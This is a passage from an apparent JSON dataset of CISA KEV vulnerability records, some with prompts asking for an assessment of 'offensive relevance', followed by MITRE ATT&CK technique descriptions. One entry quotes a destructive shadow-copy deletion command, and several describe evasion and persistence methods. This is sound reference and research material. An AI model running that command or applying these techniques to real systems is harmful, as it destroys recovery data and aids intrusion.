Universal 3D (U3D) support that could lead to remote code execution.", "nvd_description": "The U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, 8.x before 8.2 on Windows and Mac OS X, and 7.x before 7.1.4 allows remote attackers to execute arbitrary code via malformed U3D data in a PDF document, related to a CLODProgressiveMeshDeclaration \"array boundary issue,\" a different vulnerability than CVE-2009-2994.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-787"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2026-0257", "name": "Palo Alto Networks PAN-OS Authentication Bypass Vulnerability", "vendor": "Palo Alto Networks", "product": "PAN-OS", "kev_description": "Palo Alto Networks PAN-OS contains an authentication bypass vulnerability that allows attackers to bypass security restrictions and establish an unauthorized VPN connection.", "nvd_description": "Authentication bypass vulnerabilities in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS® software allows the attacker to bypass security restrictions and establish an unauthorized VPN connection.\n\nPanorama and Cloud NGFW are not impacted by these issues.", "cvss": "9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "cwes": ["CWE-565"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-53770", "name": "Microsoft SharePoint Deserialization of Untrusted Data Vulnerability", "vendor": "Microsoft", "product": "SharePoint", "kev_description": "Microsoft SharePoint Server on-premises contains a deserialization of untrusted data vulnerability that could allow an unauthorized attacker to execute code over a network. This vulnerability could be chained with CVE-2025-53771. CVE-2025-53770 is a patch bypass for CVE-2025-49704, and the updates for CVE-2025-53770 include more robust protection than those for CVE-2025-49704.", "nvd_description": "Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.\nMicrosoft is aware that an exploit for CVE-2025-53770 exists in the wild.\nMicrosoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-502"], "ransomware_use": "Known", "required_action": "Disconnect public-facing versions of SharePoint Server that have reached their end-of-life (EOL) or end-of-service (EOS) to include SharePoint Server 2013 and earlier versions. For supported versions, please follow the mitigations according to CISA (URL listed below in Notes) and vendor instructions (URL listed below in Notes). Adhere to the applicable BOD 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available."}, {"cve_id": "CVE-2024-55550", "name": "Mitel MiCollab Path Traversal Vulnerability", "vendor": "Mitel", "product": "MiCollab", "kev_description": "Mitel MiCollab contains a path traversal vulnerability that could allow an authenticated attacker with administrative privileges to read local files within the system due to insufficient input sanitization. This vulnerability can be chained with CVE-2024-41713, which allows an unauthenticated, remote attacker to read arbitrary files on the server.", "nvd_description": "Mitel MiCollab through 9.8 SP2 could allow an authenticated attacker with administrative privilege to conduct a local file read, due to insufficient input sanitization. A successful exploit could allow the authenticated admin attacker to access resources that are constrained to the admin access level, and the disclosure is limited to non-sensitive system information. This vulnerability does not allow file modification or privilege escalation.", "cvss": "2.7 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-22527", "name": "Atlassian Confluence Data Center and Server Template Injection Vulnerability", "vendor": "Atlassian", "product": "Confluence Data Center and Server", "kev_description": "Atlassian Confluence Data Center and Server contain an unauthenticated OGNL template injection vulnerability that can lead to remote code execution.", "nvd_description": "A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\n\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-74"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-47966", "name": "Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability", "vendor": "Zoho", "product": "ManageEngine", "kev_description": "Multiple Zoho ManageEngine products contain an unauthenticated remote code execution vulnerability due to the usage of an outdated third-party dependency, Apache Santuario.", "nvd_description": "Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. This affects Access Manager Plus before 4308, Active Directory 360 before 4310, ADAudit Plus before 7081, ADManager Plus before 7162, ADSelfService Plus before 6211, Analytics Plus before 5150, Application Control Plus before 10.1.2220.18, Asset Explorer before 6983, Browser Security Plus before 11.1.2238.6, Device Control Plus before 10.1.2220.18, Endpoint Central before 10.1.2228.11, Endpoint Central MSP before 10.1.2228.11, Endpoint DLP before 10.1.2137.6, Key Manager Plus before 6401, OS Deployer before 1.1.2243.1, PAM 360 before 5713, Password Manager Pro before 12124, Patch Manager Plus before 10.1.2220.18, Remote Access Plus before 10.1.2228.11, Remote Monitoring and Management (RMM) before 10.1.41. ServiceDesk Plus before 14004, ServiceDesk Plus MSP before 13001, SupportCenter Plus before 11026, and Vulnerability Manager Plus before 10.1.2220.18. Exploitation is only possible if SAML SSO has ever been configured for a product (for some products, exploitation requires that SAML SSO is currently active).", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-20"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-42278", "name": "Microsoft Active Directory Domain Services Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Active Directory", "kev_description": "Microsoft Active Directory Domain Services contains an unspecified vulnerability that allows for privilege escalation.", "nvd_description": "Active Directory Domain Services Elevation of Privilege Vulnerability", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2020-5902", "name": "F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability", "vendor": "F5", "product": "BIG-IP", "kev_description": "F5 BIG-IP Traffic Management User Interface (TMUI) contains a remote code execution vulnerability in undisclosed pages.", "nvd_description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2019-1130", "name": "Microsoft Windows AppX Deployment Service Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "A privilege escalation vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links.", "nvd_description": "An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1129.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-59"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2018-19953", "name": "QNAP NAS File Station Cross-Site Scripting Vulnerability", "vendor": "QNAP", "product": "Network Attached Storage (NAS)", "kev_description": "A cross-site scripting vulnerability affecting QNAP NAS File Station could allow remote attackers to inject malicious code.", "nvd_description": "If exploited, this cross-site scripting vulnerability could allow remote attackers to inject malicious code. QNAP has already fixed the issue in the following QTS versions. QTS 4.4.2.1231 on build 20200302; QTS 4.4.1.1201 on build 20200130; QTS 4.3.6.1218 on build 20200214; QTS 4.3.4.1190 on build 20200107; QTS 4.3.3.1161 on build 20200109; QTS 4.2.6 on build 20200109.", "cvss": "6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "cwes": ["CWE-79", "CWE-80"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2017-0213", "name": "Microsoft Windows Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows COM Aggregate Marshaler allows for privilege escalation when an attacker runs a specially crafted application.", "nvd_description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0214.", "cvss": "7.3 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-44228", "name": "Apache Log4j2 Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2021-44228\nName: Apache Log4j2 Remote Code Execution Vulnerability\nVendor/Product: Apache Log4j2\nDescription: Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2014-6271", "name": "GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2014-6271\nName: GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability\nVendor/Product: GNU Bourne-Again Shell (Bash)\nDescription: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute code.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2017-0144", "name": "Microsoft SMBv1 Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2017-0144\nName: Microsoft SMBv1 Remote Code Execution Vulnerability\nVendor/Product: Microsoft SMBv1\nDescription: The SMBv1 server in multiple Microsoft Windows versions allows remote attackers to execute arbitrary code via crafted packets.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2022-22965", "name": "Spring Framework JDK 9+ Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2022-22965\nName: Spring Framework JDK 9+ Remote Code Execution Vulnerability\nVendor/Product: VMware Spring Framework\nDescription: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2014-0160", "name": "OpenSSL Information Disclosure Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2014-0160\nName: OpenSSL Information Disclosure Vulnerability\nVendor/Product: OpenSSL OpenSSL\nDescription: The TLS and DTLS implementations in OpenSSL do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2019-0708", "name": "Microsoft Remote Desktop Services Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2019-0708\nName: Microsoft Remote Desktop Services Remote Code Execution Vulnerability\nVendor/Product: Microsoft Remote Desktop Services\nDescription: Microsoft Remote Desktop Services, formerly known as Terminal Service, contains an unspecified vulnerability that allows an unauthenticated attacker to connect to the target system using RDP and send specially crafted requests. Successful exploitation allows for remote code execution. The vulnerability is also known under the moniker of BlueKeep.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2021-34527", "name": "Microsoft Windows Print Spooler Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2021-34527\nName: Microsoft Windows Print Spooler Remote Code Execution Vulnerability\nVendor/Product: Microsoft Windows\nDescription: Microsoft Windows Print Spooler contains an unspecified vulnerability due to the Windows Print Spooler service improperly performing privileged file operations. Successful exploitation allows an attacker to perform remote code execution with SYSTEM privileges. The vulnerability is also known under the moniker of PrintNightmare.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2022-30190", "name": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2022-30190\nName: Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\nVendor/Product: Microsoft Windows\nDescription: A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2021-40444", "name": "Microsoft MSHTML Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2021-40444\nName: Microsoft MSHTML Remote Code Execution Vulnerability\nVendor/Product: Microsoft MSHTML\nDescription: Microsoft MSHTML contains a unspecified vulnerability that allows for remote code execution.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2020-1472", "name": "Microsoft Netlogon Privilege Escalation Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2020-1472\nName: Microsoft Netlogon Privilege Escalation Vulnerability\nVendor/Product: Microsoft Netlogon\nDescription: Microsoft's Netlogon Remote Protocol (MS-NRPC) contains a privilege escalation vulnerability when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller. An attacker who successfully exploits the vulnerability could run a specially crafted application on a device on the network. The vulnerability is also known under the moniker of Zerologon.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2021-26855", "name": "Microsoft Exchange Server Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2021-26855\nName: Microsoft Exchange Server Remote Code Execution Vulnerability\nVendor/Product: Microsoft Exchange Server\nDescription: Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution. This vulnerability is part of the ProxyLogon exploit chain.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2020-0796", "name": "Microsoft SMBv3 Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2020-0796\nName: Microsoft SMBv3 Remote Code Execution Vulnerability\nVendor/Product: Microsoft SMBv3\nDescription: A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2023-4966", "name": "Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2023-4966\nName: Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability\nVendor/Product: Citrix NetScaler ADC and NetScaler Gateway\nDescription: Citrix NetScaler ADC and NetScaler Gateway contain a buffer overflow vulnerability that allows for sensitive information disclosure when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply mitigations and kill all active and persistent sessions per vendor instructions [https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/] OR discontinue use of the product if mitigations are unavailable.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2024-3094", "name": "", "_prompt": "[CVE Record]\nCVE: CVE-2024-3094\nDescription: Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. \r\nThrough a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.\nCVSS: 10.0 CRITICAL\nSource: NVD\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2023-23397", "name": "Microsoft Office Outlook Privilege Escalation Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2023-23397\nName: Microsoft Office Outlook Privilege Escalation Vulnerability\nVendor/Product: Microsoft Office\nDescription: Microsoft Office Outlook contains a privilege escalation vulnerability that allows for a NTLM Relay attack against another service to authenticate as the user.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2023-44487", "name": "HTTP/2 Rapid Reset Attack Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2023-44487\nName: HTTP/2 Rapid Reset Attack Vulnerability\nVendor/Product: IETF HTTP/2\nDescription: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS).\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2017-5638", "name": "Apache Struts Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2017-5638\nName: Apache Struts Remote Code Execution Vulnerability\nVendor/Product: Apache Struts\nDescription: Apache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2019-19781", "name": "Citrix ADC, Gateway, and SD-WAN WANOP Appliance Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2019-19781\nName: Citrix ADC, Gateway, and SD-WAN WANOP Appliance Code Execution Vulnerability\nVendor/Product: Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WANOP Appliance\nDescription: Citrix ADC, Citrix Gateway, and multiple Citrix SD-WAN WANOP appliance models contain an unspecified vulnerability that could allow an unauthenticated attacker to perform code execution.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2017-11882", "name": "Microsoft Office Memory Corruption Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2017-11882\nName: Microsoft Office Memory Corruption Vulnerability\nVendor/Product: Microsoft Office\nDescription: Microsoft Office contains a memory corruption vulnerability that allows remote code execution in the context of the current user.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}, {"cve_id": "CVE-2010-2568", "name": "Microsoft Windows Remote Code Execution Vulnerability", "_prompt": "[CVE Record]\nCVE: CVE-2010-2568\nName: Microsoft Windows Remote Code Execution Vulnerability\nVendor/Product: Microsoft Windows\nDescription: Microsoft Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the operating system displays the icon of a malicious shortcut file. An attacker who successfully exploited this vulnerability could execute code as the logged-on user.\nCISA KEV: listed (confirmed exploited in the wild)\nRequired action: Apply updates per vendor instructions.\n\nAssess this CVE for offensive relevance."}], "techniques": [{"attack_id": "T1055.011", "name": "Extra Window Memory Injection", "tactics": ["stealth", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM. Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.", "detection": ""}, {"attack_id": "T1053.005", "name": "Scheduled Task", "tactics": ["execution", "persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path. An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to System Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes. Adversaries may also create \"hidden\" scheduled tasks (i.e. Hide Artifacts) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions). Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.", "detection": ""}, {"attack_id": "T1205.002", "name": "Socket Filters", "tactics": ["stealth", "persistence", "command-and-control"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria. Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling. Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.", "detection": ""}, {"attack_id": "T1560.001", "name": "Archive via Utility", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. Remote Data Staging). xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use certutil to Base64 encode collected data before exfiltration. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.", "detection": ""}, {"attack_id": "T1021.005", "name": "VNC", "tactics": ["lateral-movement"], "platforms": ["Linux", "Windows", "macOS"], "description": "Adversaries may use Valid Accounts to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network. VNC differs from Remote Desktop Protocol as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC. Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.", "detection": ""}, {"attack_id": "T1047", "name": "Windows Management Instrumentation", "tactics": ["execution"], "platforms": ["Windows"], "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model and Windows Remote Management. Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as Execution of commands and payloads. For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., Inhibit System Recovery). **Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by PowerShell as the primary WMI interface. In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.", "detection": ""}, {"attack_id": "T1687", "name": "Exploitation for Defense Impairment", "tactics": ["defense-impairment"], "platforms": ["IaaS", "Linux", "macOS", "SaaS", "Windows"], "description": "Adversaries may exploit vulnerabilities in security software, infrastructure, or defensive components to degrade, disable, or otherwise continue to impair their ability to prevent, detect, or respond to malicious activity. Adversaries may exploit a system or application vulnerability to directly interfere with defensive mechanisms. Exploitation occurs when an adversary takes advantage of a programming error in software, services, or the operating system to execute adversary-controlled code, often with the goal of weakening or disabling protections. Vulnerabilities may exist in security tools such as antivirus, endpoint detection and response (EDR), firewalls, or other monitoring solutions. Adversaries may use prior reconnaissance or perform discovery activities (e.g., Software Discovery) to identify defensive tools present in an environment and target them for exploitation. Successful exploitation may allow adversaries to terminate security processes, disable protections, bypass enforcement mechanisms, or reduce the effectiveness of defensive controls. In some cases, vulnerabilities in cloud-based or SaaS infrastructure may also be leveraged to bypass built-in security boundaries or disrupt visibility and enforcement across environments.", "detection": ""}, {"attack_id": "T1113", "name": "Screen Capture", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.", "detection": ""}, {"attack_id": "T1027.011", "name": "Fileless Storage", "tactics": ["stealth"], "platforms": ["Linux", "Windows"], "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository. Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.. Similar to fileless in-memory behaviors such as Reflective Code Loading and Process Injection, fileless data storage may remain undetected by antivirus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux. Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of Persistence) and collected data not yet exfiltrated from the victim (e.g., Local Data Staging). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.", "detection": ""}, {"attack_id": "T1037", "name": "Boot or Logon Initialization Scripts", "tactics": ["persistence", "privilege-escalation"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may use scripts automatically executed at boot or logon 